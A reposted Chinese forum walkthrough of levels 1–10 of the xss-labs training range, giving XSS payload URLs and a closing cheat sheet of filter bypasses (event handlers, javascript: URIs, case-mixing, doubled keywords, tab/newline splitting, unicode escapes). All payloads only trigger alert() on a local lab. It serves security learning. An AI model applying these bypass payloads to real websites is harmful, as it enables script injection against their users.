(转载)xss绕过的各种姿势详解

tin   ·   发表于 2020-04-21 16:51:31   ·   技术文章

xss-labs是国内一个大佬开源的xss漏洞靶子,包含一些常见的xss攻击方法。
为了方便下载,已经保存到当前服务器下

LAVEL 1

进入第一关卡,发现在url中传递的参数为:
name=浪子

并且页面输出浪子

可以推断页面会直接输出name对应的值,那么替换成js代码即可完成。


过关方式为:

  1. http://127.0.0.1/xss/level1.php?keyword=test<script>alert(‘xss’)</script>
  2. http://127.0.0.1/xss/level1.php?name=test<img src=xxxxx onerror='alert(2)'>
  3. http://127.0.0.1/xss/level1.php?name=test<svg onload='alert(1)'>
  4. http://127.0.0.1/xss/level1.php?name=a<ahref="javascript:alert(1)">aa</a>

总结:可以通过/<scr/ipt/>标签弹窗,可以通过标签里的onerror事件弹窗,可以通过javascript弹窗

LAVEL 2

这一关可以看到和第一关一样,也是直接输出内容,但是输出的内容在一个文本框里面。

通过查看页面的源代码,发现传递的参数输出的位置为:


因为输出的位置在一大段文字中,只需要闭合前后将js标签调用出来就行了

通过方式:

  1. http://127.0.0.1/xss/level2.php?keyword="/><script>alert(1)</script>
    过滤:输出点被一大段文字包围

绕过:输出点在文本框内,能够通过闭合文本框标签进行弹窗

LEVEL 3

这一关和第二关一样,都是在一大段文本中显示出你输入的参数,这个时候查看源代码,发现是单引号包围,尝试使用单引号闭合,方式:

http://127.0.0.1/xss/level3.php?keyword='/><script>alert(1)</script>

这个时候并没有想象中的弹窗,查看源代码,发现被转义了,被转义的是:

(看到这个是不是和我们靶场一样,把<>符号进行了过滤,看看怎么绕过吧!)

两处输出都对双引号、尖括号和&进行了HTML实体编码,但前面的单引号可以被闭合,考虑使用input标签的某些事件执行脚本。

自动聚焦到输入框,打开就弹
http://47.94.13.75/test/level3.php?keyword='onfocus='alert() ‘autofocus=’
自动聚焦到输入框,打开就弹
http://127.0.0.1/xss/level3.php?keyword=‘ onfocus=’alert()’ autofocus=’
点击页面非输入框的任何地方以移开焦点
http://127.0.0.1/xss/level3.php?keyword=‘ autofocus onblur=’alert()
点击输入框
http://127.0.0.1/xss/level3.php?keyword=‘ onfocus=’alert()
http://127.0.0.1/xss/level3.php?keyword=‘ onclick=’alert()
在输入框输入
http://127.0.0.1/xss/level3.php?keyword=‘ oninput=’alert()
输入然后点击搜索
http://127.0.0.1/xss/level3.php?keyword=‘ onchange=’alert()
移动鼠标经过输入框
http://127.0.0.1/xss/level3.php?keyword=‘ onmousemove=’alert()
http://127.0.0.1/xss/level3.php?keyword=‘ onmouseout=’alert()
http://127.0.0.1/xss/level3.php?keyword=‘ onmouseover=’alert()
点击输入框,进行按键操作
http://127.0.0.1/xss/level3.php?keyword=‘ onkeydown=’alert()
http://127.0.0.1/xss/level3.php?keyword=‘ onkeyup=’alert()
http://127.0.0.1/xss/level3.php?keyword=‘ onkeypress=’alert()
双击输入框
http://127.0.0.1/xss/level3.php?keyword=‘ ondblclick=’alert()
更多可用事件可以参考这里:https://www.w3schools.com/tags/ref_eventattributes.asp

收获:闭合标签属性的单引号并在标签中添加事件。
过滤:waf对双引号,尖括号,和&符号进行编码

绕过:此时通过标签里面的事件进行触发弹窗

收获:学到了许多在标签内的触发事件

LEVEL 4

通过上面三道题,逐渐掌握了做xss的套路,首先我们要明白,弹窗所需要的条件是什么,我梳理了一下:

<


(
)
script,on*事件,alert

以上是可以闭合前后标签,并且能弹窗的条件,如果没有任何拦截的话,直接弹窗就行,但是waf或者后台代码肯定会对这些标签要么转义,要么替换,这个有点类似sql注入,找到哪个标签被过滤,然后进行其他方式的绕过。

第四关中,我输入admin”和admin’,然后查看页面的源代码,发现都没有被过滤,然后输入/<scr/ipt/>,发现尖括号都被替换成空了,输入(aaa),发现()没有被过滤,整理一下:

过滤:<>

这样就没办法闭合标签,也没办法使用script标签或者img标签实现弹窗,但是因为在第三关中学到了在事件中on*事件触发弹窗,只需要闭合双引号即可。

http://127.0.0.1/xss/level4.php?keyword=“ onclick=”alert(1)
然后点击输入框,即可完成弹窗。

总结:通过输入一些弹窗的标签条件,查看源码哪些标签被过滤,然后组合其他没有被过滤的进行弹窗,这样就能诞生出自己挖掘xss的方法门路,具体实现在LEVEL 5中实现了

收获:很有必要检查闭合方式

LEVEL 5 (importance)

从level4中整理的经验,自己可以整理一下套路方法。尝试对一系列的标签进行检测,找到被过滤和没有被过滤的以及输入框的闭合形式:

闭合形式:

<input name=keyword value="xxx"> 双引号闭合
尝试输入下面的关键标签,找到过滤与没有过滤的:

  1. addd”
  2. ad’
  3. (aaa)
  4. <aaa>

  5. <script>

  6. <onload>

  7. <onerror>

  8. adad:
  9. alert
  10. href
  11. javascript
    过滤:

script变成了scr_ipt,onerror变成了o_error
未过滤:

“,’,(),<>,:,alert,href
得出无法在使用script标签和on*事件进行弹窗了,我这浅薄的知识哟~我这无知的js噢~

通过查询资料,发现通过js标签可以直接弹窗,具体方法为结合/标签使用:

<a href=javascript:'alert(1)'>点我点我</a>
这个能实现弹窗,那么就能实现弹窗了,闭合前后然后弹窗:

http://127.0.0.1/xss/level5.php?keyword="> <a href=javascript:alert(1)>点我</a><
然后点击哪个【点我】,就能实现弹窗了

宝贵的总结:通过前面几关的打打杀杀,似乎领悟到了xss弹窗的诀窍呢,整理一下:

先找到闭合方式
找到过滤的标签
找到没有被过滤的标签
结合弹窗的方式利用未过滤的标签进行弹窗,有如下方式:

直接弹窗:

<script>alert(1)</script>
在标签内事件弹窗:

<img src=一个瞎几把地址 onerror='alert(1)'>

<input value="aaa onclick="alert(1)"> <svg onload='alert(1)'> 通过js代码弹窗 <input value="aaa"> <a href=javascript:alert(1)>点我</a><> 收获:通过javascript可以实现在a标签内弹窗 #### LEVEL 6 (importance) 通过第五关,感觉自己发掘了自己的XSS弹窗秘诀呢,按照套路走一次,看看闭合方式以及被过滤的标签有哪些吧: 闭合方式: <input name=keyword value="aaa"> 双引号闭合 过滤: onerror会变成o\_error,<script>会变成<scr_ipt>,<a href> 会变成<a hr_ef> 未过滤: ',",(),<>,:,javascript,alert,但是发现<SCRipt>不会被过滤
那么闭合前后试一试:

a”><SCrIPT>alert(1)</SCRIpt>
完成弹窗:

http://127.0.0.1/xss/level6.php?keyword=a"><SCrIPT>alert(1)</SCRIpt>
http://127.0.0.1/xss/level6.php?keyword=admin“ oNClick=”alert(1)
宝贵的经验:

对LEVEL 5的套路上优化,步骤如下:

首先找到输入口闭合方式
找到被过滤的标签,尝试输入下面标签,然后看返回值哪些被过滤了:

<script>
<a href>
onerror
“alert(1)”
‘alert(1)’
javascript:
<img src>
找到被过滤的和没有过滤的,不断进行弹窗调试。

收获:使用大小写绕过过滤

#### LEVEL 7
根据优化的套路,慢慢到尝试哈,首先看闭合方式:

<input name=keyword value="langzi"> 双引号闭合
过滤:

<script> 变成了 <>
<a href> 变成了 <a>
<img src> 变成了 <img>
onerror 变成了error
javacript:变成了java:
未过滤:

alert(1) 不改变
‘alert(1)’ 不改变
“alert(1)” 不改变
所以,没有被过滤的有alert,(),<>,’,”
发现不管是任何大小写都被过滤,正当我一筹莫展的时候,突然灵机一动,菊花一麻,回忆起一个绝妙的好主意,在上传文件的时候,你上传php会被替换,但是上传pphphp的话,就会把中间的php替换成空,省下php。

结果也是这样的,因为在检查src标签的时候,一个不小心多输入了一个s,输入成ssrc,结果查看源代码发现src被替换成空,但是s还留下了。就菊花一麻想到了刚刚哪个好主意。

拿定注意,即刻构造:

“><sscriptcript>alert(1)</sscriptcript>
直接通关,美滋滋嘻嘻

http://127.0.0.1/xss/level7.php?keyword=”><sscriptcript>alert(1)</sscriptcript>
收获:当大小写无法绕过的时候,发现是使用替换命名方法,将关键词替换成空,使用SSRCRC,SRSRCC这样把中间替换成空,剩下的结果就是想要的
#### LEVEL 8
一口气拿下两关,内心忍不住有些窃喜,到第八关的时候,按照套路流程走一波,看看闭合方式,但是发现页面有些奇怪,下面有个点击的url。



按照靶场的小心思,我可以推测过关的关键点肯定在这个下面的添加友情链接这里。

但是如果在实际场景中,按照我的尿性,应该不会太注意这个。

闭合方式:

<input name=keyword value="x"> 双引号闭合
不管了,先试一试输入框:

过滤:

<script> 变成了 <script>
<a href> 变成了 <a href>
<img src> 变成了 <img src>
alert(“aaa”) 变成了 alert("aaa")

所以过滤了:<>,”
未过滤:

onerror 变成了 onerror
javascript: 变成了 javascript:
alert(1) 变成了 alert(1)
alert(‘a’) 变成了 alert(‘a’)

未过滤:onerror,alert,(),script,href,src,javascript:
感觉有凶险,因为屏蔽了双引号,输入框内无法闭合,既然无法闭合并且屏蔽就没没法使用其他标签。

这个时候发现点击友情链接位置的值发生了改变:


既然输入框没法弹窗,就从这个友情链接入手看看,因为在a标签里面,尝试使用:

<a href='javascript:alert(1)'>点我(/a)
看看,发现JavaScript被替换成了javascr_ipt,我擦,既然这样,把输出点放在友情链接的输出口,继续试一试过滤和未过滤的参数吧

闭合方式:

<a href="javascr_ipt:alert(1)">友情链接</a> 双引号闭合
过滤:

javascript:alert(1) 变成了 javascr_ipt:alert(1)
<script> 变成了 <scr_ipt> 好消息,<>没有被过滤
onerror 变成了 on_error
“ 双引号被过滤
未过滤:

alert(1) 变成了 alert(1)
<>没有被过滤
‘ 没有过滤
试了半天真的发现不了,最后从网上找到了过关的方式,使用javaScript变换(利用空白符如水平制表符HT,换行符LF,回车键CR来截断关键字)的办法绕过,这里必须在浏览器直接执行

http://127.0.0.1/xss/level8.php?keyword=javas%09cript:alert()
http://127.0.0.1/xss/level8.php?keyword=javas%0acript:alert()
http://127.0.0.1/xss/level8.php?keyword=javas%0dcript:alert()

收获:通过特殊的制表符逃过检测,网页如果有多个输出点的时候,可以尝试对不同输出点判断

#### #### LEVEL 9
这一关和上一关感觉差不多,但是友链输出点感觉做了限制:



先把突破点放在友情链接上,输入

http://
发现可以在友链中显示出来,少了一个符号都不行,我都老天鹅啊~

突然我灵机一动,写个一段html代码,保存到我都服务器的中,内容为:

<html>
<script>alert(1)</script>
</html>

然后点击添加友链:

http://127.0.0.1/xss/level9.php?keyword=http://www.langzi.fun/upload/xss.html
点击友情链接,虽然弹框了,但是并没有提示通关成功的通知,看来方向错了噢




所以说,人一旦方向错了,就成傻逼了,目标会检测输入框中有没有

http://

这个关键词,那么只要输入的参数有这个关键词即可,直接用上一次的代码,把弹窗内容改成关键词不就行了吗,我真是个睿智啊哦我擦

http://127.0.0.1/xss/level9.php?keyword=javas%0dcript:alert('http://‘)

#### LEVEL 10
这一关比较细节,尝试使用keyword做关键词搜索,输出点在网页的文本:

http://127.0.0.1/xss/level10.php?keyword=1

按照套路走一波流程,运行上面的所有技巧都没办法在一大段文本中实现弹窗,只能把目光放在下面的参数中:



写过前端的小伙伴对这样一定不陌生,发现下面有三个输入点,分别进行尝试:

http://127.0.0.1/xss/level10.php?t_link=111
http://127.0.0.1/xss/level10.php?t_history=111
http://127.0.0.1/xss/level10.php?t_sort=111
发现第三个参数会在页面输出内容(要通过查看源代码),继续按照套路走一次:

闭合方式:

<input name="t_sort" value="111" type="hidden"> 双引号闭合
过滤:

<script> 变成了 script
<a href> 变成了 a href
<img src> 变成了 img src

过滤了<>
未过滤:

alert(‘1’) 变成了 alert(‘1’)
alert(“1”) 变成了 alert(“1”)
javascript: 变成了 javascript:
onclikc 变成了onclick

未过滤’,”,(),script,a href,img src,javascript:
这样就可以通过事件来触发,但是因为页面中没有输出,也就是说你没法通过点击在执行弹窗,这个时候html的功底就显现出来了,如何在标签中加上输入框和按钮?

<input name="t_sort" value="xx type=button" type="hidden">

<input name="t_sort" value="xx type=text" type="hidden">
也就是说可以通过下面方式触发:

“ onclick=alert(1) type=”button
“ onclick=alert(1) type=”text
点击输入框和按钮完成弹窗

http://127.0.0.1/xss/level10.php?t_sort=” onclick=alert(1) type=”text
http://127.0.0.1/xss/level10.php?t_sort=” onclick=alert(1) type=”button

#### 梳理知识
按照一系列的小打小闹,还算不错得到了一些自己的套路的经验。

首先查找可控输入点与输出点
有的时候会在url中控制输入点,有的时候会在输入框中,甚至有些时候还要查看源码,自己构建输入点的url。

查找输出点的时候,务必要查看网页的源代码,找到输出点的位置。

如果输出点是在标签或者文本内,需要想办法试一试闭合。

查找被过滤的参数
比如在Firefox浏览器中,查看网页源代码:

view-source:http://127.0.0.1/xss/level11.php?t_sort=alert(“1”)
然后查看输出点,输出内容为:

<input name="t_sort" value="alert("1")" type="hidden">
判断双引号被过滤了,下面列出来一些弹窗常用的必备参数

1. <script> # <|script|>
2. <a href> # a href
3. <img src> # img|src|
4. on,比如onclick,onerror..# on系列
5. alert(‘1’) # alert|(|’|)
6. alert(“1”) # “
7. javascript: # javascript|:
|分割表示其中包含的关键参数

找出哪些过滤,哪些没有过滤,过滤了的想办法绕过

弹窗
直接弹窗:

<script>alert(1)</script>

在标签内事件弹窗:

<img src=一个瞎几把地址 onerror='alert(1)'>

<input value="aaa onclick="alert(1)">

<svg onload='alert(1)'>

通过js代码弹窗

<input value="aaa"> <a href=javascript:alert(1)>点我</a><>

常见的绕过
大小写绕过
重复文件名绕过,比如sscriptcript
javascript中(利用空白符如水平制表符HT,换行符LF,回车键CR来截断关键字)
如果页面的编码为gb*,即只要不是utf-8编码的,尝试宽字节注入
使用 ` 代替括号
HTML转义,在上面说到的实体名称和编号就是一个例子,比如:

<a href="javascript:alert(1)">s</a>
转义成:

<a href="javascript:alert(1)">s</a>
当js解释器在标识符名称(例如函数名,属性名等等)中遇到unicode编码会进行解码,并使其标志符照常生效。而在字符串中遇到unicode编码时会进行解码只会被当作字符串。注意:使用unicode编码之前要确定对方有没有过滤\。即:
将:

<script>alert(1)</script>
转成:

<script>\u0061\u006c\u0065\u0072\u0074(1)</script>

转载来自:http://langzi.fun/%E8%B7%A8%E7%AB%99%E8%84%9A%E6%9C%AC%E6%94%BB%E5%87%BB-XSS-LEVEL-1.html#LAVEL-2

用户名金币积分时间理由
奖励系统 100.00 0 2020-07-30 13:01:25 投稿满 10 赞奖励
奖励系统 50.00 0 2020-04-28 18:06:00 投稿满 5 赞奖励

打赏我,让我更有动力~

0 条回复   |  直到 2020-4-21 | 2710 次浏览
登录后才可发表内容
返回顶部 投诉反馈

© 2016 - 2024 掌控者 All Rights Reserved.